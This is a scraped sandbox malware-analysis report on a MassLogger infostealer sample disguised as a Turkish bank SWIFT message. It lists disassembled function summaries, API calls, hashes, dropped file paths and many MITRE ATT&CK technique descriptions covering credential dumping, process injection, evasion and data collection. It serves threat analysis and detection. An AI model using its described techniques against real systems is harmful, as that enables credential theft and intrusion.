Error allocating memory., xrefs: 000DA638
AutoIt, xrefs: 000DA633

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: d3c9180ea28e9b3f628569a4efe20d69e09408ab702fb41d5820d26c04ca31e7
Instruction ID: e022d1a003715cc2724b84e75853f8f4c360206b9bdfdfc4852888ce5c58b5dd
Opcode Fuzzy Hash: d3c9180ea28e9b3f628569a4efe20d69e09408ab702fb41d5820d26c04ca31e7
Instruction Fuzzy Hash: 09D02B323C032833C22036D87C07FC8754C9B17B56F040056FF08995C34AE2C69001E9

Function 0011AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 0011ACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0011AEBD

Strings

WIN_XPe, xrefs: 0011ACD3

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: 4afe0f564db5978634d507926493461019c4097eeceaf2419b5c07757908b6db
Instruction ID: 8a4167c30c67e925ab364b91608d8a695f1987451c456ccef7aa2c931fd3b81f
Opcode Fuzzy Hash: 4afe0f564db5978634d507926493461019c4097eeceaf2419b5c07757908b6db
Instruction Fuzzy Hash: B7E09270C00509EFCB29DFA4DD44AECFBB8AF48300F508092E102B2960DB705AC4DF62

Function 00108698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001086A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001086B5

Part of subcall function 000E7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000E7AD0

Strings

Shell_TrayWnd, xrefs: 0010869B

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: e72774876ffc9bbf8e054715ab02a65606305fd2ade09f85694d561b9276b400
Instruction ID: 4d2663eaf89af8241e76b6e4a621a0f534f274b8e733f61bd1a5afa2736933d5
Opcode Fuzzy Hash: e72774876ffc9bbf8e054715ab02a65606305fd2ade09f85694d561b9276b400
Instruction Fuzzy Hash: F6D02231384314BBF2386330FC0BFC63A189B00B11F000814B709AA0C0C9E0E990C720

Function 001086CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001086E2
PostMessageW.USER32(00000000), ref: 001086E9

Part of subcall function 000E7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000E7AD0

Strings

Shell_TrayWnd, xrefs: 001086DB

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 5ac02615b770ad9f38895629138bd3d81417ebcf044eca3580c55981e5ec98b3
Instruction ID: 90509342a37e2248ae6b823af13fa1d1ae3fdfbed559b1363b8d6086c01a812a
Opcode Fuzzy Hash: 5ac02615b770ad9f38895629138bd3d81417ebcf044eca3580c55981e5ec98b3
Instruction Fuzzy Hash: A9D02231380314BFF2386330FC0BFC63A189B04B11F000814B709EA0C0C9E0E990C724

Function 000DBD49 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 000DBD55
SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 000DBD63

Strings

@U=u, xrefs: 000DBD55, 000DBD63

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: b47d55535bcd7710aa2fd5aed1c78876a868f40652f2546bf8dd7802b82b76c0
Instruction ID: 0885f8bcef4f999f4c781e4d7c4636765b4532ac538e38bb3fd8987233e3835d
Opcode Fuzzy Hash: b47d55535bcd7710aa2fd5aed1c78876a868f40652f2546bf8dd7802b82b76c0
Instruction Fuzzy Hash: 7DC01271100180BAE7300B33FC0CC473E3DF7CAF01321000CB204844A5866200A2C630

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55hgpvod.jdp.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ai0iceth.pba.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ourq2vgn.02y.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxokwycy.wbs.psm1

C:\Users\user\AppData\Local\Temp\aut7125.tmp

C:\Users\user\AppData\Local\Temp\aut7934.tmp

C:\Users\user\AppData\Local\Temp\autA833.tmp

Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre